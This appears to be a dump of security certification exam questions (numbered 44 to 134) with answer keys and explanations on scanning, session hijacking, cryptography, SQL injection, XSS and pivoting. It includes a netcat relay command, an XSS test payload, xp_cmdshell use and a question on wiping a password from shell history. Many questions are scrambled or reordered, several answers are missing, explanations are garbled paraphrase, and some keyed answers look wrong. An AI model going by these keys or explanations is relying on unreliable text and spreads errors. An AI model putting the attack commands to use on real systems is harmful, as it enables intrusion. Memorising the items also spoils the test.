Bluesnarfing is the unauthorized access of information from a wireless device through a Bluetooth connection,
often between phones, desktops, laptops, and PDAs (personal digital assistant). Topic 3, Exam Pool C
QUESTION 44
if you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST. what
do you know about the firewall you are scanning?
A. There is no firewall in place.

B. This event does not tell you encrypting about the firewall.
C. It is a stateful firewall
D. It Is a non-stateful firewall.
Correct Answer: B
Section: (none)
Explanation
Explanation:
QUESTION 45
Samuel, a professional hacker, monitored and Intercepted already established traffic between Bob and a host
machine to predict Bob's ISN. Using this ISN, Samuel sent spoofed packets with Bob's IP address to the host
machine. The host machine responded with <| packet having an Incremented ISN. Consequently. Bob's
connection got hung, and Samuel was able to communicate with the host machine on behalf of Bob. What is
the type of attack performed by Samuel in the above scenario?
A. UDP hijacking
B. Blind hijacking
C. TCP/IP hacking
D. Forbidden attack
Correct Answer: C
Section: (none)
Explanation
Explanation:
it's talking with a sound client, once actually it's communication with an assaulter that has
A TCP/IP hijack is an attack that spoofs a server into thinking
condemned (or hijacked) the tcp session.
Assume that the client has administrator-level privileges, which the attacker needs to steal that authority so as
to form a brand new account with root-level access of the server to be used afterward. A tcp Hijacking is sort of
a two-phased man-in-the-middle attack. The man-in-the-middle assaulter lurks within the circuit between a
shopper and a server so as to work out what port and sequence numbers are being employed for the
conversation. First, the attacker knocks out the client with an attack, like Ping of Death, or ties it up with some
reasonably ICMP storm. This renders the client unable to the client's identity so as to talk with the server. By
this suggests, the
transmit any packets to the server. Then, with the client crashed, the attacker assumes
attacker gains administrator-level access to the server.
that's a shared secret between the shopper and also the server. looking on
One of the most effective means of preventing a hijack attack is to want a secret,
the strength of security desired, the key may be used for random exchanges. this is often once a client and
server periodically challenge each other, or it will occur with each exchange, like Kerberos.
QUESTION 46
Dorian Is sending a digitally signed email to Polly, with which key is Dorian signing this message and how is
Poly validating It?
A. Dorian is signing the message with his public key. and Poly will verify that the message came from Dorian
by using Dorian's private key.
B. Dorian Is signing the message with Polys public key. and Poly will verify that the message came from
Dorian by using Dorian's public key.
C. Dorian is signing the message with his private key. and Poly will verify that the message came from Dorian
by using Dorian's public key.
D. Dorian is signing the message with Polys private key. and Poly will verify mat the message came from
Dorian by using Dorian's public key.
Correct Answer: C
Section: (none)
Explanation
Explanation:
https://blog.mailfence.com/how-do-digital-signatures-work/https://en.wikipedia.org/wiki/Digital_signature
digital signature is a mathematical technique used to validate the authenticity and integrity of a message,
software, or digital document. It's the digital equivalent of a handwritten signature or stamped seal, but it offers
far more inherent security. A digital signature is intended to solve the problem of tampering and impersonation
in digital communications.
Digital signatures can provide evidence of origin, identity, and status of electronic documents, transactions, or
digital messages. Signers can also use them to acknowledge informed consent. Digital signatures are based on
public-key cryptography, also known as asymmetric cryptography. Two keys are generated using a public key
algorithm, such as RSA (Rivest-Shamir-Adleman), creating a mathematically linked pair of keys, one private
and one public.
Digital signatures work through public-key cryptography's two mutually authenticating cryptographic keys. The
individual who creates the digital signature uses a private key to encrypt signature-related data, while the only
way to decrypt that data is with the signer's public key.
QUESTION 47
Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity
and navigate anonymously to obtain sensitive/hidden information about official government or federal
databases. After gathering the Information, he successfully performed an attack on the target government
organization without being traced. Which of the following techniques is described in the above scenario?
A. Dark web footprinting

B. VoIP footpnnting
C. VPN footprinting
D. website footprinting
Correct Answer: A
Section: (none)
Explanation
Explanation:
The deep web is the layer of the online cyberspace that consists of web pages and content that are hidden and
unindexed.
QUESTION 48
An organization has automated the operation of critical infrastructure from a remote location. For this purpose,
all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure
the reliability of industrial networks, and reduce downtime and service disruption, the organization deckled to
install an OT security tool that further protects against security incidents such as cyber espionage, zero-day
attacks, and malware. Which of the following tools must the organization employ to protect its critical
infrastructure?
A. Robotium
B. BalenaCloud
C. Flowmon
D. IntentFuzzer
Correct Answer: C
Section: (none)
Explanation
Explanation:
Source: https://www.flowmon.com
Flowmon empowers manufacturers and utility companies to ensure the reliability of their industrial networks
confidently to avoid downtime and disruption of service continuity. This can be achieved by continuous
monitoring and anomaly detection so that malfunctioning devices or security incidents, such as cyber
espionage, zero-days, or malware, can be reported and remedied as quickly as possible.
QUESTION 49
By performing a penetration test, you gained access under a user account. During the test, you established a
connection with your own machine via the SMB service and occasionally entered your login and password in
plaintext. Which file do you have to clean to clear the password?
A. .X session-log
B. .bashrc
C. .profile
D. .bash_history
Correct Answer: D
Section: (none)
Explanation
Explanation:
File created by Bash, a Unix-based shell program commonly used on Mac OS X and Linux operating systems;
stores a history of user commands entered at the command prompt; used for viewing old commands that are
executed. BASH_HISTORY files are hidden files with no filename prefix. They always use the filename
.bash_history.
NOTE: Bash is that the shell program employed by Apple Terminal.
Our goal is to assist you understand what a file with a *.bash_history suffix is and the way to open it.
The Bash History file type, file format description, and Mac and Linux programs listed on this page are
individually researched and verified by the FileInfo we've tested and validated.
team. we attempt for 100% accuracy and only publish information about file formats that
QUESTION 50
Don, a student, came across a gaming app in a third-party app store and Installed it. Subsequently, all the
legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also
received many advertisements on his smartphone after Installing the app. What is the attack performed on Don
in the above scenario?
A. SMS phishing attack

B. SIM card attack
C. Agent Smith attack
D. Clickjacking
Correct Answer: C
Section: (none)
Explanation
Explanation:
Agent Smith Attack
Agent Smith attacks are carried out by luring victims into downloading and installing malicious apps designed
and published by attackers in the form of games, photo editors, or other attractive tools from third-party app
stores such as 9Apps. Once the user has installed the app, the core malicious code inside the application
infects or replaces the legitimate apps in the victim's mobile device C&C commands. The deceptive application
replaces legitimate apps such as WhatsApp, SHAREit, and MX Player with similar infected versions. The
application sometimes also appears to be an authentic Google product such as Google Updater or Themes.
The attacker then produces a massive volume of irrelevant and fraudulent advertisements on the victim's
device through the infected app for financial gain. Attackers exploit these apps to steal critical information such
as personal information, credentials, and bank details, from the victim's mobile device through C&C
commands.
QUESTION 51
What is the difference between the AES and RSA algorithms?
A. Both are symmetric algorithms, but AES uses 256-bit keys.

B. AES is asymmetric, which is used to create a public/private key pair.
RSA is symmetric, which is used to encrypt data.
C. Both are asymmetric algorithms, but RSA uses 1024-bit keys.
D. RSA is asymmetric, which is used to create a public/private key pair.
AES is symmetric, which is used to encrypt data.
Correct Answer: D
Section: (none)
Explanation
QUESTION 52
What is the name of the international standard that establishes a baseline level of confidence in the security
functionality of IT products by providing a set of requirements for evaluation?
A. Blue Book
B. ISO 26029
C. Common Criteria
D. The Wassenaar Agreement
Correct Answer: C
Section: (none)
Explanation
QUESTION 53
One way to defeat a multi-level security solution is to leak data via
A. a bypass regulator.
B. steganography.
C. a covert channel.
D. asymmetric routing.
Correct Answer: C
Section: (none)
Explanation
QUESTION 54
Which of the following conditions must be given to allow a tester to exploit a Cross-Site Request Forgery
(CSRF) vulnerable web application?
A. The victim user must open the malicious link with an Internet Explorer prior to version 8.
B. The session cookies generated by the application do not have the HttpOnly flag set.
C. The victim user must open the malicious link with a Firefox prior to version 3.
D. The web application should not userandom tokens.
Correct Answer: D
Section: (none)
Explanation
QUESTION 55
"Normal" SQL Injection and a "Blind" SQL Injection vulnerability?
What is the main difference between a
A. The request to the web server is not visible to the administrator of the vulnerable application.
"Blind" because, although the application properly filters user input, it is still vulnerable to code injection.
B. The attack is called
C. The successful attack does not show an error message to the administrator of the affected application.
D. The vulnerable application does not display errors with information about the injection results to the
attacker.
Correct Answer: D
Section: (none)
Explanation
QUESTION 56
During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials. The
tester assumes that the service is running with Local System account. How can this weakness be exploited to
access the system?
A. Using the Metasploit psexec module setting the SA / Admin credential

B. Invoking the stored procedure xp_shell to spawn a Windows command shell
C. Invoking the stored procedure cmd_shell to spawn a Windows command shell
D. Invoking the stored procedure xp_cmdshell to spawn a Windows command shell
Correct Answer: D
Section: (none)
Explanation
QUESTION 57
The precaution of prohibiting employees from bringing personal computing devices into a facility is what type of
security control?
A. Physical
B. Procedural
C. Technical
D. Compliance
Correct Answer: B
Section: (none)
Explanation
QUESTION 58
A pentester gains access to a Windows application server and needs to determine the settings of the built-in
Windows firewall. Which command would be used?
A. Netsh firewall show config

B. WMIC firewall show config
C. Net firewall showconfig
D. Ipconfig firewall showconfig
Correct Answer: A
Section: (none)
Explanation
QUESTION 59
Which of the following types of firewall inspects only header information in network traffic?
A. Packet filter
B. Stateful inspection
C. Circuit-level gateway
D. Application-level gateway
Correct Answer: A
Section: (none)
Explanation
QUESTION 60
During a penetration test, the tester conducts an ACK scan using NMAP against the external interface of the
DMZ firewall. NMAP reports that port 80 is unfiltered. Based on this response, which type of packet inspection
is the firewall conducting?
A. Host
B. Stateful
C. Stateless
D. Application
Correct Answer: C
Section: (none)
Explanation
QUESTION 61
Firewalk has just completed the second phase (the scanning phase) and a technician receives the output
shown below. What conclusions can be drawn based on these scan results?
no responseTCP port 22 no response

TCP port 21
Time-to-live exceeded
TCP port 23
A. The firewall itself is blocking ports 21 through 23 and a service is listening on port 23 of the target host.
B. The lack of response from ports 21 and 22 indicate that those services are not running on the destination
server.
C. The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the
firewall.
D. The scan on port 23 was able to make a connection to the destination host prompting the firewall to respond
with a TTL error.
Correct Answer: C
Section: (none)
Explanation
QUESTION 62
Which of the following is an example of an asymmetric encryption implementation?
A. SHA1
B. PGP
C. 3DES
D. MD5
Correct Answer: B
Section: (none)
Explanation
QUESTION 63
A hacker was able to sniff packets on a company's wireless network. The following information was
discovered:The Key 10110010 01001011 The Cyphertext 01100101 01011010
Using the Exlcusive OR, what was the original message?
A. 00101000 11101110
B. 11010111 00010001
C. 00001101 10100100
D. 11110010 01011011
Correct Answer: B
Section: (none)
Explanation
QUESTION 64
Which of the following cryptography attack methods is usually performed without the use of a computer?
A. Ciphertext-only attack
B. Chosen key attack
C. Rubber hose attack
D. Rainbow table attack
Correct Answer: C
Section: (none)
Explanation
QUESTION 65
Which of the following is a strong post designed to stop a car?
A. Gate
B. Fence
C. Bollard
D. Reinforced rebar
Correct Answer: C
Section: (none)
Explanation
QUESTION 66
A Network Administrator was recently promoted to Chief Security Officer at a local university. One of
employee's new responsibilities is to manage the implementation of an RFID card access system to a new
server room on campus. The server room will house student enrollment information that is securely backed up
to an off-site location.
During a meeting with an outside consultant, the Chief Security Officer explains that he is concerned that the
existing security controls have not been designedproperly. Currently, the Network Administrator is responsible
for approving and issuing RFID card access to the server room, as well as reviewing the electronic access logs
on a weekly basis.
Which of the following is an issue with the situation?
A. Segregation of duties
B. Undue influence
C. Lack of experience
D. Inadequate disaster recovery plan
Correct Answer: A
Section: (none)
Explanation
QUESTION 67
What is the most secure way to mitigate the theft of corporate information from a laptop that was left in a hotel
room?
A. Set a BIOS password.

B. Encrypt the data on the harddrive.
C. Use a strong logon password to the operating system.
D. Back up everything on the laptop and store the backup in a safe place.
Correct Answer: B
Section: (none)
Explanation
QUESTION 68
In the software security development life cycle process, threat modeling occurs in which phase?
A. Design
B. Requirements
C. Verification
D. Implementation
Correct Answer: A
Section: (none)
Explanation
QUESTION 69
A network administrator received an administrative alert at 3:00 a.m. from the intrusion detection system. The
alert was generated because a large number of packets were coming into the network over ports 20 and 21.
During analysis, there were no signs of attack on the FTP servers. How should the administrator classify this
situation?
A. True negatives
B. False negatives
C. True positives
D. False positives
Correct Answer: D
Section: (none)
Explanation
QUESTION 70
Which of the following techniques does a vulnerability scanner use in order to detect a vulnerability on a target
service?
A. Port scanning
B. Banner grabbing
C. Injecting arbitrary data
D. Analyzing service response
Correct Answer: D
Section: (none)
Explanation
QUESTION 71
Which of the following business challenges could be solved by using a vulnerability scanner?
A. Auditors want to discover if all systems are following a standard naming convention.
B. A web server was compromised and management needs to know if any further systems were
compromised.
C. There is an emergency need to remove administrator access from multiple machines for an employee that
quit.
D. There is a monthly requirement to test corporate compliance with host application usage and security
policies.
Correct Answer: D
Section: (none)
Explanation
QUESTION 72
A security policy will be more accepted by employees if it is consistent and has the support of
A. coworkers.
B. executive management.
C. the security officer.
D. a supervisor.
Correct Answer: B
Section: (none)
Explanation
QUESTION 73
A company has hired a security administrator to maintain and administer Linux and Windows-based systems.
Written in the nightly report file is the following:
Firewall log files are at the expected value of 4 MB. The current time is 12am. Exactly two hours later the size
has decreased considerably. Another hour goesby and the log files have shrunk in size again.
Which of the following actions should the security administrator take?
A. Log the event as suspicious activity and report this behavior to the incident response team immediately.
B. Log the event as suspicious activity, call a manager, and report this as soon as possible.
C. Run an anti-virus scan because it is likely the system is infected by malware.
D. Log the event as suspicious activity, continue to investigate, and act according to the site's security policy.
Correct Answer: D
Section: (none)
Explanation
QUESTION 74
Which type of scan measures a person's external features through a digital video camera?
A. Iris scan
B. Retinal scan
C. Facial recognition scan
D. Signature kinetics scan
Correct Answer: C
Section: (none)
Explanation
QUESTION 75
WPA2 uses AES for wireless data encryption at which of the following encryption levels?
A. 64 bit and CCMP

B. 128 bit and CRC
C. 128 bit and CCMP
D. 128 bit and TKIP
Correct Answer: C
Section: (none)
Explanation
QUESTION 76
An attacker uses a communication channel within an operating system that is neither designed nor intended to
transfer information. What is the name of the communications channel?
A. Classified
B. Overt
C. Encrypted
D. Covert
Correct Answer: D
Section: (none)
Explanation
QUESTION 77
What technique is used to perform a Connection Stream Parameter Pollution (CSPP) attack?
A. Injecting parameters into a connection string using semicolons as a separator

B. Inserting malicious Javascript code into input parameters
C. Setting a user's session identifier (SID) to an explicit known value
D. Adding multiple parameters with the same name in HTTP requests
Correct Answer: A
Section: (none)
Explanation
QUESTION 78
A newly discovered flaw in a software application would be considered which kind of security vulnerability?
A. Input validation flaw

B. HTTP header injectionvulnerability
C. 0-day vulnerability
D. Time-to-check to time-to-use flaw
Correct Answer: C
Section: (none)
Explanation
QUESTION 79
During a penetration test, a tester finds that the web application being analyzed is vulnerable to Cross Site
Scripting (XSS). Which of the following conditions must be met to exploit this vulnerability?
A. The web application does not have the secure flag set.
B. The session cookies do not have the HttpOnly flag set.
C. The victim user should not have an endpoint security solution.
D. The victim's browser must have ActiveX technology enabled.
Correct Answer: B
Section: (none)
Explanation
QUESTION 80
The use of alert thresholding in an IDS can reduce the volume of repeated alerts, but introduces which of the
following vulnerabilities?
A. An attacker, working slowly enough, can evade detection by the IDS.

B. Network packets are dropped if the volume exceeds the threshold.
IDS' ability to reassemble fragmented packets.
C. Thresholding interferes with the
D. The IDS will not distinguish among packets originating from different sources.
Correct Answer: A
Section: (none)
Explanation
QUESTION 81
What is the main advantage that a network-based IDS/IPS system has over a host-based solution?
A. They do not use host system resources.
B. They are placed at the boundary, allowing them to inspect all traffic.
C. They are easier to install andconfigure.
D. They will not interfere with user interfaces.
Correct Answer: A
Section: (none)
Explanation
QUESTION 82
The network administrator for a company is setting up a website with e-commerce capabilities. Packet sniffing
is a concern because credit card information willbe sent electronically over the Internet. Customers visiting the
site will need to encrypt the data with HTTPS. Which type of certificate is used to encrypt and decrypt the data?
A. Asymmetric
B. Confidential
C. Symmetric
D. Non-confidential
Correct Answer: A
Section: (none)
Explanation
QUESTION 83
When an alert rule is matched in a network-based IDS like snort, the IDS does which of the following?
A. Drops the packet and moves on to the nextone

B. Continues to evaluate the packet until all rules are checked
C. Stops checking rules, sends an alert, and lets the packet continue
D. Blocks the connection with the source IP address in the packet
Correct Answer: B
Section: (none)
Explanation
QUESTION 84
Which type of intrusion detection system can monitor and alert on attacks, but cannot stop them?
A. Detective
B. Passive
C. Intuitive
D. Reactive
Correct Answer: B
Section: (none)
Explanation
QUESTION 85
An organization hires a tester to do a wireless penetration test. Previous reports indicate that the last test did
not contain management or control packets in thesubmitted traces. Which of the following is the most likely
reason for lack of management or control packets?
A. The wireless card was not turned on.

B. The wrong network card drivers were in use byWireshark.
C. On Linux and Mac OS X, only 802.11 headers are received in promiscuous mode.
D. Certain operating systems and adapters do not collect the management or control packets.
Correct Answer: D
Section: (none)
Explanation
QUESTION 86
From the two screenshots below, which of the following is occurring?
First one:
1 [10.0.0.253]# nmap -sP 10.0.0.0/24
3 Starting Nmap
5 Host 10.0.0.1 appears to be up.
6 MAC Address: 00:09:5B:29:FD:96(Netgear)7 Host 10.0.0.2 appears to be up.
8 MAC Address: 00:0F:B5:96:38:5D (Netgear)9 Host 10.0.0.4 appears to be up.
10 Host 10.0.0.5 appears to be up.
11 MAC Address: 00:14:2A:B1:1E:2E (Elitegroup Computer System Co.)
12 Nmap finished: 256 IP addresses (4 hosts up) scanned in 5.399 seconds
Second one:
1 [10.0.0.252]# nmap -sO 10.0.0.2

3 Starting Nmap 4.01 at 2006-07-14 12:56 BST
4 Interesting protocols on 10.0.0.2:
5 (The 251 protocols scanned but not shownbeloware 6 in state: closed)
7 PROTOCOL STATE SERVICE
8 1 open icmp
9 2 open|filtered igmp
10 6 open tcp
11 17 open udp
12 255 open|filtered unknown
14 Nmap finished: 1 IP address (1 host up) scanned in15 1.259 seconds
A. 10.0.0.253 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against
10.0.0.2.
B. 10.0.0.253 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.
C. 10.0.0.2 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2.
D. 10.0.0.252 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.
Correct Answer: A
Section: (none)
Explanation
QUESTION 87
Pentest results indicate that voice over IP traffic is traversing a network. Which of the following tools will decode
a packet capture and extract thevoice conversations?
A. Cain
B. John the Ripper
C. Nikto
D. Hping
Correct Answer: A
Section: (none)
Explanation
QUESTION 88
Which technical characteristic do Ethereal/Wireshark, TCPDump, and Snort have in common?
A. They are written in Java.They send alerts to securitymonitors.

B. They use the same packet analysisengine.
C. They use the same packet captureutility.
Correct Answer:
Section: (none)
Explanation
QUESTION 89
Which set of access control solutions implements two-factor authentication?
A. USB token and PIN

B. Fingerprint scanner and retina scanner
C. Password and PIN
D. Account and password
Correct Answer: A
Section: (none)
Explanation
QUESTION 90
any's internalnetwork. Which
A security engineer has been asked to deploy a secure remote access solution that will allow employees to
connect to the comp of the following can be implemented to minimize the opportunity for the man-in-the-middle
attack to occur?
A. SSL
B. Mutual authentication
C. IPSec
D. Static IP addresses
Correct Answer: C
Section: (none)
Explanation
QUESTION 91
A person approaches a network administrator and wants advice on how to send encrypted email from home.
The end user does not want to have topay for any license fees or manage server services. Which of the
following is the most secure encryption protocol that the network administrator should recommend?
A. IP Security (IPSEC)
B. Multipurpose Internet Mail Extensions (MIME)
C. Pretty Good Privacy(PGP)
D. Hyper Text Transfer Protocol with Secure Socket Layer (HTTPS)
Correct Answer: C
Section: (none)
Explanation
QUESTION 92
To send a PGP encrypted message, which piece of information from the recipient must the sender have before
encrypting the message?
A. Recipient's private key

B. Recipient's public key
C. Master encryption key
D. Sender's public key
Correct Answer: B
Section: (none)
Explanation
QUESTION 93
An engineer is learning to write exploits in C++ and is using the exploit tool Backtrack. The engineer wants to
compile the newest C++ exploit andname it calc.exe. Which command would the engineer use to accomplish
this?
A. g++ hackersExploit.cpp -o calc.exe

B. g++ hackersExploit.py -o calc.exe
C. g++ -i hackersExploit.pl -o calc.exe
i hackersExploit.cpp -ocalc.exe
D. g++ --compile
Correct Answer: A
Section: (none)
Explanation
QUESTION 94
On a Linux device, which of the following commands will start the Nessus client in the background so that the
Nessus server can be configured?
A. nessus +
B. nessus *s
C. nessus &
D. nessus -d
Correct Answer: C
Section: (none)
Explanation
QUESTION 95
Which of the following tools will scan a network to perform vulnerability checks and compliance auditing?
A. NMAP
B. Metasploit
C. Nessus
D. BeEF
Correct Answer: C
Section: (none)
Explanation
QUESTION 96
What is the best defense against privilege escalation vulnerability?
A. Patch systems regularly and upgrade interactive login privileges at the system administrator level.
B. Run administrator and applications on least privileges and use a content registry for tracking.
C. Run services with least privileged accounts and implement multi-factor authentication and authorization.
D. Review user roles and administrator privileges for maximum utilization of automation services.
Correct Answer: C
Section: (none)
Explanation
QUESTION 97
system's kernel mode, code signing policy?
How can a rootkit bypass Windows 7 operating
A. Defeating the scanner from detecting any code change at the kernel
B. Replacing patch system calls with its own version that hides the rootkit (attacker's) actions
C. Performing common services for the application process and replacing real applications with fake ones
D. Attaching itself to the master boot record in a hard drive and changing the machine's boot sequence/options
Correct Answer: D
Section: (none)
Explanation
QUESTION 98
Which of the following items of a computer system will an anti-virus program scan for viruses?
A. Boot Sector
B. Deleted Files
C. Windows Process List
D. Password Protected Files
Correct Answer: A
Section: (none)
Explanation
QUESTION 99
Which protocol and port number might be needed in order to send log messages to a log analysis tool that
resides behind a firewall?
A. UDP 123
B. UDP 541
C. UDP 514
D. UDP 415
Correct Answer: C
Section: (none)
Explanation
QUESTION 100
A pentester is using Metasploit to exploit an FTP server and pivot to a LAN. How will the pentester pivot using
Metasploit?
A. Issue the pivot exploit and set themeterpreter.

B. Reconfigure the network settings in the meterpreter.
C. Set the payload to propagate through the meterpreter.
D. Create a route statement in themeterpreter.
Correct Answer: D
Section: (none)
Explanation
QUESTION 101
comm"nc -l -p 2222 | nc 10.1.0.43 1234"?
What is the outcome of the
A. Netcat will listen on the 10.1.0.43 interface for 1234 seconds on port 2222.
B. Netcat will listen on port 2222 and output anything received to a remote connection on 10.1.0.43 port 1234.
C. Netcat will listen for a connection from 10.1.0.43 on port 1234 and output anything received to port 2222.
D. Netcat will listen on port 2222 and then output anything received to local interface 10.1.0.43.
Correct Answer: B
Section: (none)
Explanation
QUESTION 102
Which of the following is a client-server tool utilized to evade firewall inspection?
A. tcp-over-dns
B. kismet
C. nikto
D. hping
Correct Answer: A
Section: (none)
Explanation
QUESTION 103
Which tool is used to automate SQL injections and exploit a database by forcing a given web application to
connect to another database controlledby a hacker?
A. DataThief
B. NetCat
C. Cain and Abel
D. SQLInjector
Correct Answer: A
Section: (none)
Explanation
QUESTION 104
A tester has been hired to do a web application security test. The tester notices that the site is dynamic and
must make use of a back end database. In order for the tester to see if SQL injection is possible, what is the
first character that the tester should use to attempt breakinga valid SQL request?
A. Semicolon
B. Single quote
C. Exclamation mark
D. Double quote
Correct Answer: B
Section: (none)
Explanation
QUESTION 105
Which of the following identifies the three modes in which Snort can be configured to run?
A. Sniffer, Packet Logger, and Network Intrusion Detection System

B. Sniffer, Network Intrusion Detection System, and Host Intrusion Detection System
C. Sniffer, Host Intrusion Prevention System, and Network Intrusion Prevention System
D. Sniffer, Packet Logger, and Host Intrusion Prevention System
Correct Answer: A
Section: (none)
Explanation
QUESTION 106
When using Wireshark to acquire packet capture on a network, which device would enable the capture of all
traffic on the wire?
A. Network tap
B. Layer 3 switch
C. Network bridge
D. Applicationfirewall
Correct Answer: A
Section: (none)
Explanation
QUESTION 107
Which of the following programming languages is most vulnerable to buffer overflow attacks?
A. Perl
B. C++
C. Python
D. Java
Correct Answer: B
Section: (none)
Explanation
QUESTION 108
Smart cards use which protocol to transfer the certificate in a secure manner?
A. Extensible Authentication Protocol(EAP)

B. Point to Point Protocol (PPP)
C. Point to Point Tunneling Protocol(PPTP)
D. Layer 2 Tunneling Protocol (L2TP)
Correct Answer: A
Section: (none)
Explanation
QUESTION 109
Which of the following is a hashing algorithm?
A. MD5
B. PGP
C. DES
D. ROT13
Correct Answer: A
Section: (none)
Explanation
QUESTION 110
Which of the following problems can be solved by using Wireshark?
A. Tracking version changes of source code

B. Checking creation dates on all webpages on a server
C. Resetting the administrator password on multiple systems
D. Troubleshooting communication resets between two systems
Correct Answer: D
Section: (none)
Explanation
QUESTION 111
What is the correct PCAP filter to capture all TCP traffic going to or from host 192.168.0.125 on port 25?
A. tcp.src == 25 and ip.host == 192.168.0.125 B. host192.168.0.125:25

B. port 25 and host 192.168.0.125
C. tcp.port == 25 and ip.host == 192.168.0.125
Correct Answer:
Section: (none)
Explanation
QUESTION 112
Which tool would be used to collect wireless packet data?
A. NetStumbler
B. John the Ripper
C. Nessus
D. Netcat
Correct Answer: A
Section: (none)
Explanation
QUESTION 113
Which of the following is an example of two factor authentication?
A. PIN Number and Birth Date

B. Username and Password
C. Digital Certificate and HardwareToken
D. Fingerprint and Smartcard ID
Correct Answer: D
Section: (none)
Explanation
QUESTION 114
Diffie-Hellman (DH) groups determine the strength of the key used in the key exchange process. Which of the
following is the correct bit size of the Diffie- Hellman(DH) group 5?
A. 768 bit key

B. 1025 bit key
C. 1536 bit key
D. 2048 bit key
Correct Answer: C
Section: (none)
Explanation
QUESTION 115
After gaining access to the password hashes used to protect access to a web based application, knowledge of
which cryptographic algorithms would be useful togain access to the application?
A. SHA1
B. Diffie-Helman
C. RSA
D. AES
Correct Answer: A
Section: (none)
Explanation
QUESTION 116
What statement is true regarding LM hashes?
A. LM hashes consist in 48 hexadecimal characters.

B. LM hashes are based on AES128 cryptographic standard.
C. Uppercase characters in the password are converted to lowercase.
D. LM hashes are not generated when the password length exceeds 15 characters.
Correct Answer: D
Section: (none)
Explanation
QUESTION 117
A developer for a company is tasked with creating a program that will allow customers to update their billing and
shipping information. The billing address field usedis limited to 50 characters. What pseudo code would the
developer use to avoid a buffer overflow attack on the billing address field?
A. if (billingAddress = 50) {update field} else exit

B. if (billingAddress != 50) {update field} else exit
C. if (billingAddress >= 50) {update field} else exit
D. if (billingAddress <= 50) {update field} else exit
Correct Answer: D
Section: (none)
Explanation
QUESTION 118
A security analyst in an insurance company is assigned to test a new web application that will be used by clients
to help them choose and apply for an insurance plan. The analyst discovers that the application is developed in
ASP scripting language and it uses MSSQL as a database backend. The analyst locates the application's
search form and introduces the following code in the search input field:
IMG SRC=vbscript:msgbox("Vulnerable");> originalAttribute="SRC" originalPath="vbscript:msgbox

("Vulnerable");>"When the analyst submits the form, the
browser returns a pop-up window that says "Vulnerable".

Which web applications vulnerability did the analyst discover?
A. Cross-site request forgery

B. Command injection
C. Cross-site scripting
D. SQL injection
Correct Answer: C
Section: (none)
Explanation
QUESTION 119
company's webserver contains suspicious entries:
A security administrator notices that the log file of the
Based on source code analysis, the analyst concludes that the login.php script is vulnerable to
A. command injection.
B. SQL injection.
C. directory traversal.
D. LDAP injection.
Correct Answer: B
Section: (none)
Explanation
QUESTION 120
Which solution can be used to emulate computer services, such as mail and ftp, and to capture information
related to logins or actions?
A. Firewall
B. Honeypot
C. Core server
D. Layer 4 switch
Correct Answer: B
Section: (none)
Explanation
QUESTION 121
Which command lets a tester enumerate alive systems in a class C network via ICMP using native Windows
tools?A. ping 192.168.2.
A. ping 192.168.2.255
B. for %V in (1 1 255) do PING 192.168.2.%V
C. for /L %V in (1 1 254) do PING -n 1 192.168.2.%V | FIND /I "Reply"
Correct Answer:
Section: (none)
Explanation
QUESTION 122
What results will the following command yield: 'NMAP -sS -O -p 123-153 192.168.100.3'?
A. A stealth scan, opening port 123 and153

B. A stealth scan, checking open ports 123 to153
C. A stealth scan, checking all open ports excluding ports 123 to 153
D. A stealth scan, determine operating system, and scanning ports 123 to 153
Correct Answer: D
Section: (none)
Explanation
QUESTION 123
Which of the following parameters enables NMAP's operating system detection feature?
A. NMAP -sV
B. NMAP -oS
C. NMAP -sR
D. NMAP -O
Correct Answer: D
Section: (none)
Explanation
QUESTION 124
Which of the following open source tools would be the best choice to scan a network for potential targets?
A. NMAP
B. NIKTO
C. CAIN
D. John the Ripper
Correct Answer: A
Section: (none)
Explanation
QUESTION 125
A hacker is attempting to see which IP addresses are currently active on a network. Which NMAP switch would
the hacker use?
A. -sO
B. -sP
C. -sS
D. -sU
Correct Answer: B
Section: (none)
Explanation
QUESTION 126
A hacker, who posed as a heating and air conditioning specialist, was able to install a sniffer program in a
switched environment network. Which attack could thehacker use to sniff all of the packets in the network?
A. Fraggle
B. MAC Flood
C. Smurf
D. Tear Drop
Correct Answer: B
Section: (none)
Explanation
QUESTION 127
Which of the following settings enables Nessus to detect when it is sending too many packets and the network
pipe is approaching capacity?
A. Netstat WMI Scan

B. Silent Dependencies
C. Consider unscanned ports asclosed
D. Reduce parallel connections oncongestion
Correct Answer: D
Section: (none)
Explanation
QUESTION 128
How does an operating system protect the passwords used for account logins?
A. The operating system performs a one-way hash of the passwords.

B. The operating system stores the passwords in a secret file that users cannot find.
C. The operating system encrypts the passwords, and decrypts them when needed.
D. The operating system stores all passwords in a protected segment of non-volatile memory.
Correct Answer: A
Section: (none)
Explanation
QUESTION 129
Which of the following viruses tries to hide from anti-virus programs by actively altering and corrupting the
chosen service call interruptions when they are beingrun?
A. Cavity virus
B. Polymorphic virus
C. Tunneling virus
D. Stealth virus
Correct Answer: D
Section: (none)
Explanation
QUESTION 130
An attacker has been successfully modifying the purchase price of items purchased on the company's web site.
The security administrators verify the web serverand Oracle database have not been compromised directly.
They have also verified the Intrusion Detection System (IDS) logs and found no attacks that could have caused
this. What is the mostly likely way the attacker has been able to modify the purchase price?
A. By using SQLinjection
B. By changing hidden form values
C. By using cross site scripting
D. By utilizing a buffer overflow attack
Correct Answer: B
Section: (none)
Explanation
QUESTION 131
Which tool can be used to silently copy files from USB devices?
A. USB Grabber
B. USB Dumper
C. USB Sniffer
D. USB Snoopy
Correct Answer: B
Section: (none)
Explanation
QUESTION 132
Which of the following is used to indicate a single-line comment in structured query language (SQL)?
A. --
B. ||
C. %%
D. ''
Correct Answer: A
Section: (none)
Explanation
QUESTION 133
company's internal network. The engineer enters in the following NMAP command:
A security engineer is attempting to map a
n sS P0 p 80 ***.***.**.** What type ofscan is this?

NMAP
A. Quick scan
B. Intense scan
C. Stealth scan
D. Comprehensive scan
Correct Answer: C
Section: (none)
Explanation
QUESTION 134
What is the broadcast address for the subnet 190.86.168.0/22?
A. 190.86.168.255
B. 190.86.255.255
C. 190.86.171.255
D. 190.86.169.255
